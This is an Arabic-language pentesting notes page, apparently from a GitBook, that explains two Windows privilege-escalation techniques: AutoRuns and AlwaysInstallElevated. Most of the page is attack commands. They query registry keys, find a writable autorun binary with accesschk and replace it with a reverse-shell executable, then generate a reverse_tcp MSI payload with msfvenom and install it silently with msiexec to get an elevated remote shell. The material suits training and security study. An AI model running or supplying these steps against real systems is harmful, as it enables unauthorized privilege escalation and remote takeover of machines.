Registry

AutoRuns

وحدة من ملفات ال Registry اسمها AutoRun وبداخلها نقدر نشوف ايش البرامج الي تشتغل مع بداية تشغيل الجهاز. نقدر نبدأ بفحص AutoRun:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

نقدر نستخم accesschk.exe و نشوف وحدة من البرامج الكل يقدر يعدل عليه:

accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"

ننسخ ملف ال reverse shell مكانه:

copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y

شغل ال listener وسوي Restart للجهاز. عشان يضبط هذه العملية لازم ال admin يدخل على الجهاز عشان ترجع لك ال shell:

AlwaysInstallElevated

هي عبارة عن خاصية او function تخلي اليوزر العادي يشغل اي ملف MSI. خلونا نسوي check على AlwaysInstallElevated Keys:

--> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

--> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

من الصورة نقدر نشوف قيمة ال keys هي عبارة عن (0x1) والي تعني ان خاصية AlwaysInstallElevated فعالة. اول شي نسوي ملف MSI عن طريق msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your-ip> LPORT=<your-port> -f msi -o reverse.msi

نقدر نشغل الملف ب msiexec ورح ترجع لنا Reverse shell:

msiexec /quiet /qn /i C:\PrivEsc\reverse.msi

PreviousToken Impersonation NextXML External Entity (XXE)

Last updated 4 years ago

Was this helpful?

hashtagAutoRuns

hashtagAlwaysInstallElevated

AutoRuns

AlwaysInstallElevated